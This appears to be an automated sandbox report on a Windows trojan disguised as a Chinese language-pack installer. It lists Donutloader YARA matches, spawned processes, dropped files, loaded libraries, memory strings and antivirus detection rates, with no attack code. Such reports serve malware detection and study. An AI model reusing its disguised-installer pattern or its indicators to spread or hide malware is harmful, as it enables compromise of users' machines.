Source: 4.2.#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe.379d450.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000010.00000002.3133400888.000001A3542C0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000003.3075008585.000000000C131000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000D.00000002.3132436281.0000000000600000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000002.3148591529.000000000C0F8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000003.3075284546.000000000C0DC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000003.3075862798.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.3133593277.0000000001013000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000003.3075284546.000000000C0A9000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000003.3075911766.000000000C0F1000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.2313605934.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000C.00000002.3148264683.000000000C0A9000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: Microsoft_Xtools.exe.4.dr

Static PE information: Section: .rsrc ZLIB complexity 0.9914981617647058

Source: classification engine

Classification label: mal100.troj.evad.winEXE@13/21@2/2

Source: C:\Windows\explorer.exe

13_2_02206300

Source: C:\Windows\explorer.exe

Code function: 13_2_02207A20 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CoCreateInstance,RegQueryValueExW,

13_2_02207A20

Source: C:\Windows\explorer.exe

Code function: 13_2_02207A20 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CoCreateInstance,RegQueryValueExW,

13_2_02207A20

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

File created: C:\Users\user\8cb0240ffaae4

Jump to behavior

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Mutant created: NULL
Source: C:\Windows\System32\OpenWith.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7888

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\bc7d67fe-0f03-4faf-a822-a8e3269a24e5

Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe

Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT [Id], [AssetPayload], [Status], [LastRefreshTime] FROM [Asset] WHERE [Id]=?;
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT [Id], [AssetPayload], [Status], [LastRefreshTime] FROM [Asset] WHERE [Status]=?;
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [Asset] ([Id], [AssetPayload], [Status], [LastRefreshTime]) VALUES (?,?,?,?);
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [Activity_PackageId] ([ActivityId], [Platform], [PackageName], [ExpirationTime]) VALUES (?,?,?,?);
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO [Activity] ([Id], [AppId], [PackageIdHash], [AppActivityId], [ActivityType], [ActivityStatus], [ParentActivityId], [Tag], [Group], [MatchId], [LastModifiedTime], [ExpirationTime], [Payload], [Priority], [IsLocalOnly], [PlatformDeviceId], [CreatedInCloud], [StartTime], [EndTime], [LastModifiedOnClient], [GroupAppActivityId], [ClipboardPayload], [EnterpriseId], [UserActionState], [IsRead], [GroupItems], [DdsDeviceId], [LocalExpirationTime], [ETag]) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,(SELECT [Value] FROM [ManualSequence] WHERE [Key] = 'Activity'));
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE [DataEncryptionKeys]([KeyVersion] INTEGER PRIMARY KEY NOT NULL, [KeyValue] TEXT NOT NULL COLLATE NOCASE, [CreatedInCloudTime] DATETIME NOT NULL);
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE [ManualSequence] SET [Value] = [Value] + 1 WHERE [Key] = 'Activity';
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 1 FROM [Asset] WHERE [Id]=? AND [Status]=?;
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT 1 FROM [Asset] WHERE [Id]=?;
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE [Asset] SET [AssetPayload]=?, [Status]=?, [LastRefreshTime]=? WHERE [Id]=?;

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Virustotal: Detection: 41%
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe "C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe"
Source: unknown	Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process created: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe "C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe "C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7888 -s 368
Source: unknown	Process created: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
Source: unknown	Process created: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Process created: C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe "C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe "C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe	Jump to behavior

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinui.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.appdefaults.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uianimation.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll	Jump to behavior
